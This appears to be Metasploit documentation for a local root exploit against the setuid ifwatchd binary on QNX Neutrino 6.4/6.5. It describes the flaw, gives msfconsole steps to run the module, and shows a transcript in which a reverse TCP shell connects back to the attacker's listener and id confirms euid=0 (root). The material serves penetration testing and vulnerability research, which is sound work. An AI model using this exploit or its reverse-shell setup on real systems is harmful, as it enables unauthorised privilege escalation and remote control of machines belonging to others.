Description

This module attempts to gain root privileges on QNX 6.4.x and 6.5.x systems by exploiting the ifwatchd suid executable.

Vulnerable Application

ifwatchd allows users to specify scripts to execute using the -A command line argument; however, it does not drop privileges when executing user-supplied scripts, resulting in execution of arbitrary commands as root.

This module has been tested successfully on:

• QNX Neutrino 6.5.0 (x86)

• QNX Neutrino 6.5.0 SP1 (x86)

QNX Neutrino 6.5.0 Service Pack 1 is available here:

• http://www.qnx.com/download/feature.html?programid=23665

Verification Steps

1. Start msfconsole

2. use exploit/qnx/local/ifwatchd_priv_esc

3. set session <ID>

4. run

5. You should get a root session

Options

SESSION

Which session to use, which can be viewed with sessions

WritableDir

A writable directory file system path. (default: /tmp)

Scenarios

msf > use exploit/qnx/local/ifwatchd_priv_esc
msf exploit(qnx/local/ifwatchd_priv_esc) > set session 1 
session => 1
msf exploit(qnx/local/ifwatchd_priv_esc) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf exploit(qnx/local/ifwatchd_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.188:4444 
[*] Writing interface arrival event script...
[*] Executing /sbin/ifwatchd...
[*] Command shell session 2 opened (172.16.191.188:4444 -> 172.16.191.215:65500) at 2018-03-22 15:18:48 -0400

id
uid=100(test) gid=100 euid=0(root)
uname -a
QNX localhost 6.5.0 2012/06/20-13:50:50EDT x86pc x86